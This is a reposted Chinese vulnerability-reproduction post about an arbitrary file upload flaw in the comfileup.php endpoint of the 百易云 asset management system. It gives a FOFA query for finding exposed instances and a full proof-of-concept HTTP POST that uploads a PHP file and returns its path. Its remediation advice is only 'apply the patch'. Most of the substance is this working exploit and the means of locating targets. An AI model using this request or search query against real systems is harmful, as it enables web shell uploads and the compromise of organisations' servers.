百易云资产管理运营系统comfileup.php接口存在任意文件上传漏洞 附POC

admin 2024年9月28日10:07:50评论5 views字数 919阅读3分3秒阅读模式

 

1. 百易云资产管理运营系统简介

微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发

百易云资产管理运营系统

2.漏洞描述

百易云资产管理运营系统comfileup.php接口存在任意文件上传漏洞

百易云资产管理运营系统,是专门针对企业不动产资产管理和运营需求而设计的一套综合解决方案。该系统能够覆盖资产的全生命周期管理,包括资产的登记、盘点、评估、处置等多个环节,同时提供强大的运营分析功能,帮助企业优化资产配置,提升运营效率。

CVE编号:

CNNVD编号:

CNVD编号:

3.影响版本

百易云资产管理运营系统

百易云资产管理运营系统comfileup.php接口存在任意文件上传漏洞 附POC
百易云资产管理运营系统comfileup.php接口存在任意文件上传漏洞

4.fofa查询语句

body="不要着急,点此"

5.漏洞复现

漏洞链接:http://xx.xx.xx.xxx/comfileup.php

漏洞数据包:

POST /comfileup.php HTTP/1.1
Host: xx.xx.xx.xx
User-Agent:Mozilla/4.0(compatible; MSIE 8.0;Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept:*/*
Connection: close
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 196
Content-Type: multipart/form-data; boundary=e41701466d7dc994c100ad681c62b987

--e41701466d7dc994c100ad681c62b987
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: application/octet-stream

842013547311
--e41701466d7dc994c100ad681c62b987--
百易云资产管理运营系统comfileup.php接口存在任意文件上传漏洞 附POC

发包会返回文件上传的路径

百易云资产管理运营系统comfileup.php接口存在任意文件上传漏洞 附POC

 

7.整改意见

打补丁

原文始发于微信公众号(南风漏洞复现文库):百易云资产管理运营系统comfileup.php接口存在任意文件上传漏洞 附POC

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月28日10:07:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   百易云资产管理运营系统comfileup.php接口存在任意文件上传漏洞 附POChttp://cn-sec.com/archives/3110911.html

发表评论

匿名网友 填写信息